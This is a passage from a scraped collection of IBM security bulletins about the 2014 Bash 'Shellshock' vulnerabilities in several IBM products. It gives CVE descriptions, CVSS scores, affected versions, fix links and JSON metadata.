\n[_http://www-933.ibm.com/support/fixcentral/swg/selectFixes?parent=ibm~WebSphere&product=ibm/WebSphere/IBM+Workload+Deployer&release=All&platform=All&function=fixId&fixids=HV_RHEL6_X64_PATCHES_EFIX&includeSupersedes=0_](<http://www-933.ibm.com/support/fixcentral/swg/selectFixes?parent=ibm~WebSphere&product=ibm/WebSphere/IBM+Workload+Deployer&release=All&platform=All&function=fixId&fixids=HV_RHEL6_X64_PATCHES_EFIX&includeSupersedes=0>) \n\n * Import the eFix into the IBM Workload Deployer Emergency Fix catalog.\n \n\n * For deployed instances, apply this Emergency Fix on the virtual machine. Bash is upgraded to version `bash-4.1.2-15.e16_5.2`. \n \n \n**Option 2:** Upgrade the virtual machine with fixes obtained from Red Hat \n\n\n * Contact Red Hat to obtain fixes and install these fixes directly on the deployed virtual machines as needed.\n \n \nFor images, you must extend and capture the image by using the following general procedure: \n\n 1. Import the eFix into the IBM Workload Deployer Emergency Fix catalog.\n 2. From the image catalog, select the image and click \"Extend.\"\n 3. After the image extend operation completes succcessfully, click Service from the deployed virtual machine.\n 4. Apply this emergency fix.\n 5. From the image catalog, capture the image.\n \nUse this newly captured image for future deployment. \n\n## Workarounds and Mitigations\n\nNone known\n\n## Get Notified about Future Security Bulletins\n\nSubscribe to [My Notifications](< http://www-01.ibm.com/software/support/einfo.html>) to be notified of important product support alerts like this.\n\n### References \n\n[Complete CVSS v2 Guide](<http://www.first.org/cvss/v2/guide> \"Link resides outside of ibm.com\" ) \n[On-line Calculator v2](<http://nvd.nist.gov/CVSS-v2-Calculator> \"Link resides outside of ibm.com\" )\n\nOff \n\n## Related Information\n\n[IBM Secure Engineering Web Portal](<http://www.ibm.com/security/secure-engineering/bulletins.html>) \n[IBM Product Security Incident Response Blog](<http://www.ibm.com/blogs/psirt>)\n\n[_Subscribe to Security Bulletins_](<http://www.ibm.com/support/mynotifications/>)\n\n## Acknowledgement\n\nNone\n\n## Change History\n\n03 October 2014 Original Version Published \n31 October 2014 Updated CVSS information for CVE-2014-7186 and CVE-2014-7187 \n\n*The CVSS Environment Score is customer environment specific and will ultimately impact the Overall CVSS Score. Customers can evaluate the impact of this vulnerability in their environments by accessing the links in the Reference section of this Security Bulletin.\n\n## Disclaimer\n\nAccording to the Forum of Incident Response and Security Teams (FIRST), the Common Vulnerability Scoring System (CVSS) is an \"industry open standard designed to convey vulnerability severity and help to determine urgency and priority of response.\" IBM PROVIDES THE CVSS SCORES \"\"AS IS\"\" WITHOUT WARRANTY OF ANY KIND, INCLUDING THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE. CUSTOMERS ARE RESPONSIBLE FOR ASSESSING THE IMPACT OF ANY ACTUAL OR POTENTIAL SECURITY VULNERABILITY. In addition to other efforts to address potential vulnerabilities, IBM periodically updates the record of components contained in our product offerings. As part of that effort, if IBM identifies previously unidentified packages in a product/service inventory, we address relevant vulnerabilities regardless of CVE date. Inclusion of an older CVEID does not demonstrate that the referenced product has been used by IBM since that date, nor that IBM was aware of a vulnerability as of that date. We are making clients aware of relevant vulnerabilities as we become aware of them. \"Affected Products and Versions\" referenced in IBM Security Bulletins are intended to be only products and versions that are supported by IBM and have not passed their end-of-support or warranty date. Thus, failure to reference unsupported or extended-support products and versions in this Security Bulletin does not constitute a determination by IBM that they are unaffected by the vulnerability. Reference to one or more unsupported versions in this Security Bulletin shall not create an obligation for IBM to provide fixes for any unsupported or extended-support products or versions.\n\n[{\"Product\":{\"code\":\"SSZ6WM\",\"label\":\"IBM Workload Deployer\"},\"Business Unit\":{\"code\":\"BU053\",\"label\":\"Cloud & Data Platform\"},\"Component\":\"Security\",\"Platform\":[{\"code\":\"PF009\",\"label\":\"Firmware\"}],\"Version\":\"3.1.0.7;3.1.0.6;3.1.0.2;3.1.0.1;3.1\",\"Edition\":\"\",\"Line of Business\":{\"code\":\"LOB15\",\"label\":\"Integration\"}}]", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2018-06-15T07:01:49", "type": "ibm", "title": "Security Bulletin: Vulnerabilities in Bash affect IBM Workload Deployer (CVE-2014-6271, CVE-2014-7169, CVE-2014-7186, CVE-2014-7187, CVE-2014-6277, CVE-2014-6278)", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2014-6271", "CVE-2014-6277", "CVE-2014-6278", "CVE-2014-7169", "CVE-2014-7186", "CVE-2014-7187"], "modified": "2018-06-15T07:01:49", "id": "0139C39E0ED48888EF6FC334B5A408C62415667035711D7DAE1D3BB2BBBCA3F0", "href": "https://www.ibm.com/support/pages/node/252711", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-06-28T22:07:01", "description": "## Summary\n\nSix Bash vulnerabilities were disclosed in September 2014. This bulletin addresses the vulnerabilities that have been referred to as \u201cBash Bug\u201d or \u201cShellshock\u201d and two memory corruption vulnerabilities. Bash is used by IBM Security Network Intrusion Prevention System.\n\n## Vulnerability Details\n\n \n**CVE-ID**: [_CVE-2014-6271_](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-6271>) \n \n**DESCRIPTION**: GNU Bash could allow a remote attacker to execute arbitrary commands on the system, caused by an error when evaluating specially-crafted environment variables passed to it by the bash functionality. An attacker could exploit this vulnerability to write to files and execute arbitrary commands on the system. \n \nCVSS Base Score: 10.0 \nCVSS Temporal Score: See [_https://exchange.xforce.ibmcloud.com/vulnerabilities/96153_](<https://exchange.xforce.ibmcloud.com/vulnerabilities/96153>) for the current score \nCVSS Environmental Score*: Undefined \nCVSS Vector: (AV:N/AC:L/Au:N/C:C/I:C/A:C) \n \n \n**CVE-ID**: [_CVE-2014-7169_](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-7169>) \n \n**DESCRIPTION**: GNU Bash could allow a remote attacker to execute arbitrary commands on the system, caused by an incomplete fix related to malformed function definitions in the values of environment variables. An attacker could exploit this vulnerability using attack vectors involving the ForceCommand feature in OpenSSH sshd, the mod_cgi and mod_cgid modules in the Apache HTTP Server to write to files and execute arbitrary commands on the system. \n \nCVSS Base Score: 10.0 \nCVSS Temporal Score: See [_https://exchange.xforce.ibmcloud.com/vulnerabilities/96209_](<https://exchange.xforce.ibmcloud.com/vulnerabilities/96209>) for the current score \nCVSS Environmental Score*: Undefined \nCVSS Vector: (AV:N/AC:L/Au:N/C:C/I:C/A:C) \n \n \n**CVE-ID**: [_CVE-2014-7186_](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-7186>) \n \n**DESCRIPTION**: GNU Bash could allow a local attacker to execute arbitrary code on the system, caused by an out-of-bounds memory access while handling redir_stack. An attacker could exploit this vulnerability to execute arbitrary code on the system or cause a denial of service. \n \nCVSS Base Score: 4.6 \nCVSS Temporal Score: See [_https://exchange.xforce.ibmcloud.com/vulnerabilities/96237_](<https://exchange.xforce.ibmcloud.com/vulnerabilities/96237>) for the current score \nCVSS Environmental Score*: Undefined \nCVSS Vector: (AV:L/AC:L/Au:N/C:P/I:P/A:P) \n \n \n**CVE-ID**: [_CVE-2014-7187_](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-7187>) \n \n**DESCRIPTION**: GNU Bash could allow a local attacker to execute arbitrary code on the system, caused by an off-by-one-error when handling deeply nested flow control constructs. An attacker could exploit this vulnerability to execute arbitrary code on the system or cause a denial of service. \n \nCVSS Base Score: 4.6 \nCVSS Temporal Score: See [_https://exchange.xforce.ibmcloud.com/vulnerabilities/96238_](<https://exchange.xforce.ibmcloud.com/vulnerabilities/96238>) for the current score \nCVSS Environmental Score*: Undefined \nCVSS Vector: (AV:L/AC:L/Au:N/C:P/I:P/A:P) \n \n \n**CVE-ID: **[_CVE-2014-6277_](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-6277>) \n \n**DESCRIPTION**: GNU Bash could allow a remote attacker to execute arbitrary code on the system, caused by an incomplete fix related to the failure to properly parse function definitions in the values of environment variables. An attacker could exploit this vulnerability using attack vectors involving the ForceCommand feature in OpenSSH sshd, the mod_cgi and mod_cgid modules in the Apache HTTP Server to execute arbitrary code on the system or cause a denial of service. \n \nCVSS Base Score: 10.0 \nCVSS Temporal Score: See [_https://exchange.xforce.ibmcloud.com/vulnerabilities/96686_](<https://exchange.xforce.ibmcloud.com/vulnerabilities/96686>) for the current score \nCVSS Environmental Score*: Undefined \nCVSS Vector: (AV:N/AC:L/Au:N/C:C/I:C/A:C) \n \n \n**CVE-ID:**[_CVE-2014-6278_](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-6278>) \n \n**DESCRIPTION**: GNU Bash could allow a remote attacker to execute arbitrary code on the system, caused by an incomplete fix related to the parsing of user scripts. An attacker could exploit this vulnerability to execute arbitrary code on the system or cause a denial of service. \n \nCVSS Base Score: 10.0 \nCVSS Temporal Score: See [_https://exchange.xforce.ibmcloud.com/vulnerabilities/96687_](<https://exchange.xforce.ibmcloud.com/vulnerabilities/96687>) for the current score \nCVSS Environmental Score*: Undefined \nCVSS Vector: (AV:N/AC:L/Au:N/C:C/I:C/A:C)\n\n## Affected Products and Versions\n\n**Products: **GX3002, GX4002, GX4004, GX4004-v2, GX5008, GX5008-v2, GX5108, GX5108-v2, GX5208, GX5208-v2, GX6116, GX7412, GX7412-10, GX7412-05, GX7800, GV200, GV1000 \n**Firmware versions: **4.6.2, 4.6.1, 4.6, 4.5, 4.4, and 4.3\n\n## Remediation/Fixes\n\nThe following IBM Threat Fixpacks have the fixes for these vulnerabilities: \n\n * [__4.6.2.0-ISS-ProvG-AllModels-System-FP0002__](<http://www-933.ibm.com/support/fixcentral/swg/selectFixes?parent=Security+Systems&product=ibm/Tivoli/Proventia+Network+Intrusion+Prevention+System&release=All&platform=All&function=all>)__ \n___for all IBM Security Network Intrusion Prevention System products at Firmware version 4.6.2_\n * [__4.6.1.0-ISS-ProvG-AllModels-System-FP0006__](<http://www-933.ibm.com/support/fixcentral/swg/selectFixes?parent=Security+Systems&product=ibm/Tivoli/Proventia+Network+Intrusion+Prevention+System&release=All&platform=All&function=all>)_ \n__for all IBM Security Network Intrusion Prevention System products at Firmware version 4.6.1_\n * [__4.6.0.0-ISS-ProvG-AllModels-System-FP0004__](<http://www-933.ibm.com/support/fixcentral/swg/selectFixes?parent=Security+Systems&product=ibm/Tivoli/Proventia+Network+Intrusion+Prevention+System&release=All&platform=All&function=all>)_ \n__for all IBM Security Network Intrusion Prevention System products at Firmware version 4.6_\n * [__4.5.0.0-ISS-ProvG-AllModels-System-FP0006__](<http://www-933.ibm.com/support/fixcentral/swg/selectFixes?parent=Security+Systems&product=ibm/Tivoli/Proventia+Network+Intrusion+Prevention+System&release=All&platform=All&function=all>)_ \n__for all IBM Security Network Intrusion Prevention System products at Firmware version 4.5_\n * [__4.4.0.0-ISS-ProvG-AllModels-System-FP0006__](<http://www-933.ibm.com/support/fixcentral/swg/selectFixes?parent=Security+Systems&product=ibm/Tivoli/Proventia+Network+Intrusion+Prevention+System&release=All&platform=All&function=all>)_ \n__for all IBM Security Network Intrusion Prevention System products at Firmware version 4.4_\n * [__4.3.0.0-ISS-ProvG-AllModels-System-FP0004__](<http://www-933.ibm.com/support/fixcentral/swg/selectFixes?parent=Security+Systems&product=ibm/Tivoli/Proventia+Network+Intrusion+Prevention+System&release=All&platform=All&function=all>) \n_for all IBM Security Network Intrusion Prevention System products at Firmware version 4.3_\n \nIBM recommends that you review your entire environment to identify vulnerable releases of Bash including your Operating Systems and take appropriate mitigation and remediation actions. Please contact your Operating System provider for more information. \n\n## Workarounds and Mitigations\n\nNone\n\n## Get Notified about Future Security Bulletins\n\nSubscribe to [My Notifications](< http://www-01.ibm.com/software/support/einfo.html>) to be notified of important product support alerts like this.\n\n### References \n\n[Complete CVSS v2 Guide](<http://www.first.org/cvss/v2/guide> \"Link resides outside of ibm.com\" ) \n[On-line Calculator v2](<http://nvd.nist.gov/CVSS-v2-Calculator> \"Link resides outside of ibm.com\" )\n\nOff \n\n## Related Information\n\n[IBM Secure Engineering Web Portal](<http://www.ibm.com/security/secure-engineering/bulletins.html>) \n[IBM Product Security Incident Response Blog](<http://www.ibm.com/blogs/psirt>)\n\n*The CVSS Environment Score is customer environment specific and will ultimately impact the Overall CVSS Score. Customers can evaluate the impact of this vulnerability in their environments by accessing the links in the Reference section of this Security Bulletin.\n\n## Disclaimer\n\nAccording to the Forum of Incident Response and Security Teams (FIRST), the Common Vulnerability Scoring System (CVSS) is an \"industry open standard designed to convey vulnerability severity and help to determine urgency and priority of response.\" IBM PROVIDES THE CVSS SCORES \"\"AS IS\"\" WITHOUT WARRANTY OF ANY KIND, INCLUDING THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE. CUSTOMERS ARE RESPONSIBLE FOR ASSESSING THE IMPACT OF ANY ACTUAL OR POTENTIAL SECURITY VULNERABILITY. In addition to other efforts to address potential vulnerabilities, IBM periodically updates the record of components contained in our product offerings. As part of that effort, if IBM identifies previously unidentified packages in a product/service inventory, we address relevant vulnerabilities regardless of CVE date. Inclusion of an older CVEID does not demonstrate that the referenced product has been used by IBM since that date, nor that IBM was aware of a vulnerability as of that date. We are making clients aware of relevant vulnerabilities as we become aware of them. \"Affected Products and Versions\" referenced in IBM Security Bulletins are intended to be only products and versions that are supported by IBM and have not passed their end-of-support or warranty date. Thus, failure to reference unsupported or extended-support products and versions in this Security Bulletin does not constitute a determination by IBM that they are unaffected by the vulnerability. Reference to one or more unsupported versions in this Security Bulletin shall not create an obligation for IBM to provide fixes for any unsupported or extended-support products or versions.\n\n[{\"Product\":{\"code\":\"SS9SBT\",\"label\":\"Proventia Network Intrusion Prevention System\"},\"Business Unit\":{\"code\":\"BU059\",\"label\":\"IBM Software w\\/o TPS\"},\"Component\":\"Not Applicable\",\"Platform\":[{\"code\":\"PF009\",\"label\":\"Firmware\"}],\"Version\":\"4.3;4.4;4.5;4.6;4.6.1;4.6.2\",\"Edition\":\"\",\"Line of Business\":{\"code\":\"LOB24\",\"label\":\"Security Software\"}}]", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-02-23T17:14:38", "type": "ibm", "title": "Security Bulletin: Vulnerabilities in Bash affect Network Intrusion Prevention System (CVE-2014-6271, CVE-2014-7169, CVE-2014-7186, CVE-2014-7187, CVE-2014-6277, CVE-2014-6278)", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2014-6271", "CVE-2014-6277", "CVE-2014-6278", "CVE-2014-7169", "CVE-2014-7186", "CVE-2014-7187"], "modified": "2022-02-23T17:14:38", "id": "9362FDC04C7CF0E7E11E00C238107A825074E1BBD7D4631CDE9FBBBA3D068B3A", "href": "https://www.ibm.com/support/pages/node/252417", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-06-28T22:10:49", "description": "## Summary\n\nSix Bash vulnerabilities were disclosed in September 2014. This bulletin \naddresses the vulnerabilities that have been referred to as \u201cBash Bug\u201d or \u201cShellshock\u201d \nand two memory corruption vulnerabilities. Bash is used by IBM SDN VE.\n\n## Vulnerability Details\n\n**CVE-ID**: CVE-2014-6271 \n**DESCRIPTION**: GNU Bash could allow a remote attacker to execute arbitrary \ncommands on the system, caused by an error when evaluating specially-crafted \nenvironment variables passed to it by the bash functionality. An attacker could exploit \nthis vulnerability to write to files and execute arbitrary commands on the system. \nCVSS Base Score: 10.0 \nCVSS Temporal Score: See [**http://xforce.iss.net/xforce/xfdb/96153**](<http://xforce.iss.net/xforce/xfdb/96153>)** **for the current score \nCVSS Environmental Score*: Undefined \nCVSS Vector: (AV:N/AC:L/Au:N/C:C/I:C/A:C) \n \n**CVE-ID**: CVE-2014-7169 \n**DESCRIPTION**: GNU Bash could allow a remote attacker to execute arbitrary \ncommands on the system, caused by an incomplete fix related to malformed function \ndefinitions in the values of environment variables. An attacker could exploit this \nvulnerability using attack vectors involving the ForceCommand feature in OpenSSH \nsshd, the mod_cgi and mod_cgid modules in the Apache HTTP Server to write to files \nand execute arbitrary commands on the system. \nCVSS Base Score: 10.0 \nCVSS Temporal Score: See [**http://xforce.iss.net/xforce/xfdb/96209**](<http://xforce.iss.net/xforce/xfdb/96209>)** **for the current score \nCVSS Environmental Score*: Undefined \nCVSS Vector: (AV:N/AC:L/Au:N/C:C/I:C/A:C) \n \n**CVE-ID**: CVE-2014-7186 \n**DESCRIPTION**: GNU Bash could allow a local attacker to execute arbitrary code on \nthe system, caused by an out-of-bounds memory access while handling redir_stack. An \nattacker could exploit this vulnerability to execute arbitrary code on the system or cause a \ndenial of service. \nCVSS Base Score: 4.6 \nCVSS Temporal Score: See <http://xforce.iss.net/xforce/xfdb/96237> for the current score \nCVSS Environmental Score*: Undefined \nCVSS Vector: (AV:L/AC:L/Au:N/C:P/I:P/A:P) \n \n**CVE-ID**: CVE-2014-7187 \n**DESCRIPTION**: GNU Bash could allow a local attacker to execute arbitrary code on \nthe system, caused by an off-by-one-error when handling deeply nested flow control \nconstructs. An attacker could exploit this vulnerability to execute arbitrary code on the \nsystem or cause a denial of service. \nCVSS Base Score: 4.6 \nCVSS Temporal Score: See <http://xforce.iss.net/xforce/xfdb/96238> for the current score \nCVSS Environmental Score*: Undefined \nCVSS Vector: (AV:L/AC:L/Au:N/C:P/I:P/A:P) \n \n**CVE-ID**: CVE-2014-6277 \n**DESCRIPTION**: GNU Bash could allow a remote attacker to execute arbitrary code on \nthe system, caused by an incomplete fix related to the failure to properly parse function \ndefinitions in the values of environment variables. An attacker could exploit this \nvulnerability using attack vectors involving the ForceCommand feature in OpenSSH \nsshd, the mod_cgi and mod_cgid modules in the Apache HTTP Server to execute \narbitrary code on the system or cause a denial of service. \nCVSS Base Score: 10.0 \nCVSS Temporal Score: See <http://xforce.iss.net/xforce/xfdb/96686> for the current score \nCVSS Environmental Score*: Undefined \nCVSS Vector: (AV:N/AC:L/Au:N/C:C/I:C/A:C) \n \n**CVE-ID**: CVE-2014-6278 \n**DESCRIPTION**: GNU Bash could allow a remote attacker to execute arbitrary code on \nthe system, caused by an incomplete fix related to the parsing of user scripts. An attacker \ncould exploit this vulnerability to execute arbitrary code on the system or cause a denial \nof service. \nCVSS Base Score: 10.0 \nCVSS Temporal Score: See <http://xforce.iss.net/xforce/xfdb/96687> for the current score \nCVSS Environmental Score*: Undefined \nCVSS Vector: (AV:N/AC:L/Au:N/C:C/I:C/A:C)\n\n## Affected Products and Versions\n\nIBM SDN VE, Unified Controller, VMware Edition: 1.2.0 and earlier \nIBM SDN VE, Unified Controller, KVM Edition: 1.2.0 and earlier \nIBM SDN VE, Unified Controller, OpenFlow Edition: 1.2.0 and earlier \nIBM SDN VE, Dove Management Console, VMware Edition: 1.0.0 \nIBM SDN VE, Service Appliance, VMware Edition: 1.2.0 and earlier \nIBM SDN VE, Service Appliance, KVM Edition: 1.2.0 and earlier\n\n## Remediation/Fixes\n\nIBM recommends updating affected IBM SDN VE, Unified Controllers and IBM SDN \nVE, Service Appliances to the latest versions of IBM SDN VE for which IBM is \nproviding a fix, which are identified below: \nIBM SDN VE, Unified Controller, VMware Edition: version 1.2.1 or later \nIBM SDN VE, Unified Controller, KVM Edition: version 1.2.1 or later \nIBM SDN VE, Unified Controller, OpenFlow Edition: version 1.2.1 or later \nIBM SDN VE, Service Appliance, VMware Edition: version 1.2.1 or later \nIBM SDN VE, Service Appliance, KVM Edition: version 1.2.1 or later \n \n**These versions are available via Passport Advantage.**\n\n## Workarounds and Mitigations\n\nNone known\n\n## Get Notified about Future Security Bulletins\n\nSubscribe to [My Notifications](< http://www-01.ibm.com/software/support/einfo.html>) to be notified of important product support alerts like this.\n\n### References \n\n[Complete CVSS v2 Guide](<http://www.first.org/cvss/v2/guide> \"Link resides outside of ibm.com\" ) \n[On-line Calculator v2](<http://nvd.nist.gov/CVSS-v2-Calculator> \"Link resides outside of ibm.com\" )\n\nOff \n\n## Related Information\n\n[IBM Secure Engineering Web Portal](<http://www.ibm.com/security/secure-engineering/bulletins.html>) \n[IBM Product Security Incident Response Blog](<http://www.ibm.com/blogs/psirt>)\n\n[Subscribe to Security Bulletins](<http://www.ibm.com/support/mynotifications/>)\n\n## Acknowledgement\n\nNone\n\n## Change History\n\n09 October 2014: Original Version Published\n\n*The CVSS Environment Score is customer environment specific and will ultimately impact the Overall CVSS Score. Customers can evaluate the impact of this vulnerability in their environments by accessing the links in the Reference section of this Security Bulletin.\n\n## Disclaimer\n\nAccording to the Forum of Incident Response and Security Teams (FIRST), the Common Vulnerability Scoring System (CVSS) is an \"industry open standard designed to convey vulnerability severity and help to determine urgency and priority of response.\" IBM PROVIDES THE CVSS SCORES \"\"AS IS\"\" WITHOUT WARRANTY OF ANY KIND, INCLUDING THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE. CUSTOMERS ARE RESPONSIBLE FOR ASSESSING THE IMPACT OF ANY ACTUAL OR POTENTIAL SECURITY VULNERABILITY. In addition to other efforts to address potential vulnerabilities, IBM periodically updates the record of components contained in our product offerings. As part of that effort, if IBM identifies previously unidentified packages in a product/service inventory, we address relevant vulnerabilities regardless of CVE date. Inclusion of an older CVEID does not demonstrate that the referenced product has been used by IBM since that date, nor that IBM was aware of a vulnerability as of that date. We are making clients aware of relevant vulnerabilities as we become aware of them. \"Affected Products and Versions\" referenced in IBM Security Bulletins are intended to be only products and versions that are supported by IBM and have not passed their end-of-support or warranty date. Thus, failure to reference unsupported or extended-support products and versions in this Security Bulletin does not constitute a determination by IBM that they are unaffected by the vulnerability. Reference to one or more unsupported versions in this Security Bulletin shall not create an obligation for IBM to provide fixes for any unsupported or extended-support products or versions.\n\n![SDN-VE-Bash Security Bulletin contains 6 CVEs.pdf](/support/pages/system/files/support/isg/isgtech.nsf/0/33a7bb4c56efd43b85257d6d0008d6ae/RelatedAttachment/0.FA.gif)SDN-VE-Bash Security Bulletin contains 6 CVEs.pdf\n\n[{\"Product\":{\"code\":\"SGFUE4\",\"label\":\"IBM Software Defined Network for Virtual Environments\"},\"Business Unit\":{\"code\":\"BU054\",\"label\":\"Systems w\\/TPS\"},\"Component\":\"--\",\"Platform\":[{\"code\":\"PF025\",\"label\":\"Platform Independent\"}],\"Version\":\"1.0;1.1;1.2\",\"Edition\":\"\",\"Line of Business\":{\"code\":\"\",\"label\":\"\"}}]", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2018-06-18T01:26:35", "type": "ibm", "title": "Security Bulletin: Vulnerabilities in Bash affect IBM SDN VE (CVE-2014-6271,\nCVE-2014-7169, CVE-2014-7186, CVE-2014-7187, CVE-2014-6277, CVE-2014-6278)", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2014-6271", "CVE-2014-6277", "CVE-2014-6278", "CVE-2014-7169", "CVE-2014-7186", "CVE-2014-7187"], "modified": "2018-06-18T01:26:35", "id": "221250DD6B489029C97D621490473ABEB793A5150987E9EA8B66A1F61836221E", "href": "https://www.ibm.com/support/pages/node/679639", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-06-28T22:10:57", "description": "## Summary\n\nSix Bash vulnerabilities were disclosed in September 2014. This bulletin addresses the vulnerabilities that have been referred to as \u201cBash Bug\u201d or \u201cShellshock\u201d and two memory corruption vulnerabilities. Bash is used by IBM Netezza Host Management.\n\n## Vulnerability Details\n\n**CVE-ID**: [_CVE-2014-6271_](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-6271>) \n \n**DESCRIPTION**: GNU Bash could allow a remote attacker to execute arbitrary commands on the system, caused by an error when evaluating specially-crafted environment variables passed to it by the bash functionality. An attacker could exploit this vulnerability to write to files and execute arbitrary commands on the system. \n \nCVSS Base Score: 10.0 \nCVSS Temporal Score: See [**_https://exchange.xforce.ibmcloud.com/vulnerabilities/96153_**](<https://exchange.xforce.ibmcloud.com/vulnerabilities/96153>) for the current score \nCVSS Environmental Score*: Undefined \nCVSS Vector: (AV:N/AC:L/Au:N/C:C/I:C/A:C) \n \n \n**CVE-ID**: [_CVE-2014-7169_](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-7169>) \n \n**DESCRIPTION**: GNU Bash could allow a remote attacker to execute arbitrary commands on the system, caused by an incomplete fix related to malformed function definitions in the values of environment variables. An attacker could exploit this vulnerability using attack vectors involving the ForceCommand feature in OpenSSH sshd, the mod_cgi and mod_cgid modules in the Apache HTTP Server to write to files and execute arbitrary commands on the system. \n \nCVSS Base Score: 10.0 \nCVSS Temporal Score: See [**_https://exchange.xforce.ibmcloud.com/vulnerabilities/96209_**](<https://exchange.xforce.ibmcloud.com/vulnerabilities/96209>) for the current score \nCVSS Environmental Score*: Undefined \nCVSS Vector: (AV:N/AC:L/Au:N/C:C/I:C/A:C) \n \n \n**CVE-ID**: [_CVE-2014-7186_](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-7186>) \n \n**DESCRIPTION**: GNU Bash could allow a remote attacker to execute arbitrary code on the system, caused by an out-of-bounds memory access while handling redir_stack. An attacker could exploit this vulnerability to execute arbitrary code on the system or cause a denial of service. \n \nCVSS Base Score: 10 \nCVSS Temporal Score: See [_https://exchange.xforce.ibmcloud.com/vulnerabilities/96237_](<https://exchange.xforce.ibmcloud.com/vulnerabilities/96237>) for the current score \nCVSS Environmental Score*: Undefined \nCVSS Vector: (AV:N/AC:L/Au:N/C:C/I:C/A:C) \n \n \n**CVE-ID**: [_CVE-2014-7187_](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-7187>) \n \n**DESCRIPTION**: GNU Bash could allow a remote attacker to execute arbitrary code on the system, caused by an off-by-one-error when handling deeply nested flow control constructs. An attacker could exploit this vulnerability to execute arbitrary code on the system or cause a denial of service. \n \nCVSS Base Score: 10 \nCVSS Temporal Score: See [_https://exchange.xforce.ibmcloud.com/vulnerabilities/96238_](<https://exchange.xforce.ibmcloud.com/vulnerabilities/96238>) for the current score \nCVSS Environmental Score*: Undefined \nCVSS Vector: (AV:N/AC:L/Au:N/C:C/I:C/A:C) \n \n \n[_CVE-2014-6277_](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-6277>) \n \n**DESCRIPTION**: GNU Bash could allow a remote attacker to execute arbitrary code on the system, caused by an incomplete fix related to the failure to properly parse function definitions in the values of environment variables. An attacker could exploit this vulnerability using attack vectors involving the ForceCommand feature in OpenSSH sshd, the mod_cgi and mod_cgid modules in the Apache HTTP Server to execute arbitrary code on the system or cause a denial of service. \n \nCVSS Base Score: 10.0 \nCVSS Temporal Score: See [_https://exchange.xforce.ibmcloud.com/vulnerabilities/96686_](<https://exchange.xforce.ibmcloud.com/vulnerabilities/96686>) for the current score \nCVSS Environmental Score*: Undefined \nCVSS Vector: (AV:N/AC:L/Au:N/C:C/I:C/A:C) \n \n 